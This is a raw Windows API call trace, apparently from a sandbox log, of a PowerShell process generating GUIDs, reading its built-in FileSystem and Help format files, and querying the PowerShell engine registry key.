	[0478.360] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x98798172, Data2=0x278e, Data3=0x463b, Data4=([0]=0xae, [1]=0x92, [2]=0xc1, [3]=0x84, [4]=0x6b, [5]=0xd3, [6]=0x1b, [7]=0x4f))) returned 0x0
	[0478.360] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x44098f1a, Data2=0xe333, Data3=0x47ea, Data4=([0]=0xa9, [1]=0xd6, [2]=0xf0, [3]=0xb0, [4]=0xcb, [5]=0xe1, [6]=0x95, [7]=0xcf))) returned 0x0
	[0478.360] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1748c6b7, Data2=0xf216, Data3=0x4c77, Data4=([0]=0xae, [1]=0x2f, [2]=0x42, [3]=0x4f, [4]=0xb8, [5]=0x31, [6]=0xb0, [7]=0x6a))) returned 0x0
	[0478.361] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x228b0eba, Data2=0x304f, Data3=0x4411, Data4=([0]=0xaf, [1]=0x7c, [2]=0xee, [3]=0xa9, [4]=0x5c, [5]=0x2f, [6]=0xb9, [7]=0x27))) returned 0x0
	[0478.361] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x64228eda, Data2=0x684, Data3=0x4309, Data4=([0]=0x92, [1]=0xf4, [2]=0x5a, [3]=0xc, [4]=0xa7, [5]=0xe, [6]=0x2, [7]=0xa2))) returned 0x0
	[0478.361] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x9385fede, Data2=0xc5c6, Data3=0x4454, Data4=([0]=0x80, [1]=0x17, [2]=0xd1, [3]=0x76, [4]=0x74, [5]=0x70, [6]=0xb0, [7]=0x1f))) returned 0x0
	[0478.362] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x1ec23fb6, Data2=0x4cb, Data3=0x49a6, Data4=([0]=0x86, [1]=0xa6, [2]=0xd3, [3]=0x23, [4]=0x94, [5]=0x1c, [6]=0x7e, [7]=0x71))) returned 0x0
	[0478.362] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0478.362] GetFileType (hFile=0x30c) returned 0x1
	[0478.362] SetErrorMode (uMode=0x1) returned 0x1
	[0478.362] GetFileType (hFile=0x30c) returned 0x1
	[0478.362] ReadFile (in: hFile=0x30c, lpBuffer=0x2f1ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f1ebe8*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.363] ReadFile (in: hFile=0x30c, lpBuffer=0x2f1ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f1ebe8*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.364] ReadFile (in: hFile=0x30c, lpBuffer=0x2f1ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f1ebe8*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.364] ReadFile (in: hFile=0x30c, lpBuffer=0x2f1ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f1ebe8*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.364] ReadFile (in: hFile=0x30c, lpBuffer=0x2f1ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f1ebe8*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.364] ReadFile (in: hFile=0x30c, lpBuffer=0x2f1ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f1ebe8*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.364] ReadFile (in: hFile=0x30c, lpBuffer=0x2f1ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f1ebe8*, lpNumberOfBytesRead=0x24d038*=0x119, lpOverlapped=0x0) returned 1
	[0478.364] ReadFile (in: hFile=0x30c, lpBuffer=0x2f1ebe8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f1ebe8*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0478.365] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfe0 | out: lpFileInformation=0x24cfe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e2b98c, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e2b98c, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e76251, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x6119)) returned 1
	[0478.365] SetErrorMode (uMode=0x1) returned 0x1
	[0478.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0478.365] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x30c) returned 0x0
	[0478.365] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d04c, lpData=0x0, lpcbData=0x24d048*=0x0 | out: lpType=0x24d04c*=0x1, lpData=0x0, lpcbData=0x24d048*=0x56) returned 0x0
	[0478.365] CoTaskMemAlloc (cb=0x5a) returned 0x46ea70
	[0478.365] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d01c, lpData=0x46ea70, lpcbData=0x24d018*=0x56 | out: lpType=0x24d01c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d018*=0x56) returned 0x0
	[0478.365] CoTaskMemFree (pv=0x46ea70) 
	[0478.365] RegCloseKey (hKey=0x30c) returned 0x0
	[0478.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0478.366] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml", lpFilePart=0x0) returned 0x43
	[0478.367] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x8257adcb, Data2=0xf746, Data3=0x473e, Data4=([0]=0xa6, [1]=0x31, [2]=0x84, [3]=0x99, [4]=0x8d, [5]=0x4e, [6]=0x47, [7]=0xc7))) returned 0x0
	[0478.367] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0xfb34a141, Data2=0x1eca, Data3=0x4af1, Data4=([0]=0xa3, [1]=0x3c, [2]=0xf2, [3]=0x25, [4]=0xae, [5]=0x2, [6]=0x2f, [7]=0x18))) returned 0x0
	[0478.367] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x11bc8b1c, Data2=0x2dcf, Data3=0x4280, Data4=([0]=0x88, [1]=0x95, [2]=0xa4, [3]=0x5a, [4]=0xf2, [5]=0xbf, [6]=0xe1, [7]=0xaa))) returned 0x0
	[0478.367] CoCreateGuid (in: pguid=0x24d2f0 | out: pguid=0x24d2f0*(Data1=0x39b18ac0, Data2=0x318f, Data3=0x460a, Data4=([0]=0x8c, [1]=0x3d, [2]=0xd, [3]=0xd7, [4]=0x76, [5]=0x6f, [6]=0xce, [7]=0x69))) returned 0x0
	[0478.367] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Help.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\help.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x30c
	[0478.368] GetFileType (hFile=0x30c) returned 0x1
	[0478.368] SetErrorMode (uMode=0x1) returned 0x1
	[0478.368] GetFileType (hFile=0x30c) returned 0x1
	[0478.368] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.369] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.369] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.369] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.369] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.370] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.370] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.370] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.371] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.371] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.371] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.371] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.372] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.372] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.372] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.372] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.374] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.374] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.374] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.374] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.375] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.375] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.375] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.375] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.376] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.376] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.376] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.376] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.376] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0478.377] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.439] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.439] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.441] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.441] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.442] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.442] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.442] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.442] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.443] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.443] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.443] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.443] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.444] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.444] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.444] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.444] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.445] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.445] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.445] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.445] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.446] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.446] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.446] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.446] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.447] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.447] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.447] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.447] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.448] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.448] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.448] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.448] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x1000, lpOverlapped=0x0) returned 1
	[0479.449] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0xf37, lpOverlapped=0x0) returned 1
	[0479.449] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7a427, nNumberOfBytesToRead=0xc9, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7a427*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0479.449] ReadFile (in: hFile=0x30c, lpBuffer=0x2f7ad88, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24d038, lpOverlapped=0x0 | out: lpBuffer=0x2f7ad88*, lpNumberOfBytesRead=0x24d038*=0x0, lpOverlapped=0x0) returned 1
	[0479.450] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d0c8 | out: phkResult=0x24d0c8*=0x30c) returned 0x0
